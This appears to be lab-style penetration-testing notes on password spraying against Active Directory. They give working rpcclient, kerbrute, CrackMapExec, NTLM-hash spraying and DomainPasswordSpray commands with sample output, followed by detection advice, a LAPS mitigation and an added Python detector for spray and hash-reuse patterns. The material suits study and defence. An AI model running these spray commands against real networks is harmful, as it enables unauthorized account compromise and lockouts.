Given a list of valid usernames that exist in the domain, we can try to find their password with a Password Spray attack: one password is tried against every account, which keeps each account below the lockout threshold.
From Linux #
rpcclient #
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" <ip_address>; done
The output looks like this:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: sgage, Authority Name: INLANEFREIGHT
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: mholliday, Authority Name: INLANEFREIGHT
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
We can clean it up to show just the successful logins by grepping for “Authority”:
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" <ip_address> | grep Authority; done
Account Name: sgage, Authority Name: INLANEFREIGHT
Account Name: mholliday, Authority Name: INLANEFREIGHT
Kerbrute #
kerbrute passwordspray -d inlanefreight.local --dc <ip_address> valid_users.txt Welcome1
2025/04/17 07:22:52 > [+] VALID LOGIN: sgage@inlanefreight.local:Welcome1
2025/04/17 07:22:52 > Done! Tested 23 logins (1 successes) in 0.058 seconds
CrackMapExec #
We can pass a text file containing a list of usernames and try a single password against all of them.
sudo crackmapexec smb <ip_address> -u valid_users.txt -p Password123
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\administrator:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\guest:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\krbtgt:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\lab_adm:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123
Or show just the successful logins:
sudo crackmapexec smb <ip_address> -u valid_users.txt -p Password123 | grep +
If we get a hit, we can validate the credentials directly against the domain controller:
sudo crackmapexec smb <ip_address> -u <username> -p <password>
Password Reuse #
If we managed to retrieve the NTLM hash for the local administrator account, we can try to spray the hash across the whole network to see if the same password was used on other machines for other local admins.
Remember to set the --local-auth flag so that the tool tries the credentials as a local account, with only one login per host; otherwise every attempt is sent to the domain and we risk locking out the domain's built-in administrator instead of the local machine account.
sudo crackmapexec smb --local-auth <network/mask> -u administrator -H <NTLM Hash> | grep +
Keep in mind that this method is very noisy and not suited for evasive tests.
Microsoft's Local Administrator Password Solution (LAPS) is a good way to mitigate the issue of local administrator password reuse.
From Windows #
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
Output will look like this:
[*] Current domain is compatible with Fine-Grained Password Policy.
[*] Now creating a list of users to spray...
[*] The smallest lockout threshold discovered in the domain is 5 login attempts.
[*] Removing disabled users from list.
[*] There are 2940 total users found.
[*] Removing users within 1 attempt of locking out from list.
[*] Created a userlist containing 2940 users gathered from the current user's domain
[*] The domain password policy observation window is set to minutes.
[*] Setting a minute wait in between sprays.
Confirm Password Spray
Are you sure you want to perform a password spray against 2940 accounts?
[Y] Yes [N] No [?] Help (default is "Y"): y
[*] Password spraying has begun with 1 passwords
[*] This might take a while depending on the total number of users
[*] Now trying password Winter2022 against 2940 users. Current time is 6:16 AM
[*] Writing successes to spray_success
[*] SUCCESS! User:dbranch Password:Winter2022
269 of 2940 users tested
This kind of attack can be detected by monitoring for “Event ID 4625: An account failed to log on” in the Security event log of the domain controller. When the spray uses LDAP instead of SMB, the events are instead “Event ID 4771: Kerberos pre-authentication failed”, which requires Kerberos auditing to be enabled beforehand. Many such events in a short period of time, spread across many different accounts rather than repeated against one, may indicate a password spray attack.
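The following is an added example, not part of the original notes, showing the two detections the notes motivate in working code: the password spray pattern (one source failing as many distinct accounts in a short window, via 4625 or 4771) from the paragraph above, and the local administrator hash reuse pattern (one source producing 4624 network logons as the local administrator on many distinct hosts) from the Password Reuse section. The event records, thresholds and field names are constructed assumptions that mirror the Security log fields; they are not taken from any real environment.

```python
"""
Spray detection over Windows Security events (added example, not part of
the original notes). All sample events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs the notes call out: 4625 (NTLM/SMB logon failure) and 4771
# (Kerberos pre-authentication failure; needs Kerberos auditing enabled).
FAILURE_IDS = {4625, 4771}


def _make(time, event_id, user, src, host, domain="INLANEFREIGHT", logon_type=3):
    """Build one event reduced to the fields the detections need. In real
    telemetry these map to TargetUserName, IpAddress (strip any '::ffff:'
    prefix first), Computer, TargetDomainName and LogonType."""
    return {"time": time, "id": event_id, "user": user, "src": src,
            "host": host, "domain": domain, "logon_type": logon_type}


# Constructed sample log: five situations, two of which should alert.
SAMPLE_EVENTS = (
    # 1) one source failing as 12 different domain accounts in two seconds
    [_make(f"2025-04-17T07:22:{50 + i // 6:02d}", 4625, f"user{i:02d}",
           "172.16.5.225", "ACADEMY-EA-DC01") for i in range(12)]
    # 2) the Kerberos variant of the same thing from a second source
    + [_make(f"2025-04-17T07:30:{i:02d}", 4771, f"svc{i:02d}",
             "172.16.5.226", "ACADEMY-EA-DC01") for i in range(11)]
    # 3) benign: one user mistyping their own password three times
    + [_make(f"2025-04-17T08:00:{i:02d}", 4625, "mholliday",
             "172.16.5.50", "ACADEMY-EA-DC01") for i in range(3)]
    # 4) the LOCAL administrator logging on to six workstations from one
    #    source (for local accounts TargetDomainName equals the host name)
    + [_make(f"2025-04-17T09:00:{i:02d}", 4624, "administrator",
             "172.16.5.225", f"WS{i:02d}", domain=f"WS{i:02d}") for i in range(6)]
    # 5) benign: the DOMAIN administrator logging on to the DC once
    + [_make("2025-04-17T09:05:00", 4624, "administrator",
             "172.16.5.10", "ACADEMY-EA-DC01")]
)


def _max_distinct_in_window(items, window):
    """items: list of (datetime, value). Slide a time window over the sorted
    list and return (max distinct values seen in one window, first, last)."""
    items.sort()
    counts = defaultdict(int)
    best = (0, None, None)
    start = 0
    for t_end, value in items:
        counts[value] += 1
        # drop events that fell out of the window ending at t_end
        while t_end - items[start][0] > window:
            old = items[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        if len(counts) > best[0]:
            best = (len(counts), items[start][0], t_end)
    return best


def _alerts(keyed, window, threshold, kind):
    """Emit one alert per key whose best window reaches the threshold."""
    alerts = []
    for key, items in keyed.items():
        distinct, first, last = _max_distinct_in_window(items, window)
        if distinct >= threshold:
            alerts.append({"kind": kind, "source": key, "distinct": distinct,
                           "first": first.isoformat(), "last": last.isoformat()})
    return alerts


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=10):
    """One source IP failing (4625 or 4771) as >= min_accounts distinct
    accounts inside the window. A single user retrying does not trigger."""
    keyed = defaultdict(list)
    for e in events:
        if e["id"] in FAILURE_IDS:
            keyed[e["src"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    return _alerts(keyed, window, min_accounts, "password_spray")


def detect_local_admin_reuse(events, window=timedelta(minutes=5), min_hosts=5,
                             account="administrator"):
    """One source IP succeeding (4624, network logon type 3) as the LOCAL
    administrator on >= min_hosts distinct hosts inside the window, which is
    what a shared local admin password sprayed across the network looks
    like. Domain accounts are excluded because their domain != host."""
    keyed = defaultdict(list)
    for e in events:
        if (e["id"] == 4624 and e["logon_type"] == 3
                and e["user"].lower() == account
                and e["domain"].lower() == e["host"].lower()):
            keyed[e["src"]].append((datetime.fromisoformat(e["time"]), e["host"].lower()))
    return _alerts(keyed, window, min_hosts, "local_admin_reuse")


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS) + detect_local_admin_reuse(SAMPLE_EVENTS):
        print(alert)
```

Both detections key on the source address rather than the target account, because a spray deliberately stays under the per-account lockout threshold; the thresholds (10 accounts, 5 hosts, 5 minutes) are starting points to tune against your own baseline.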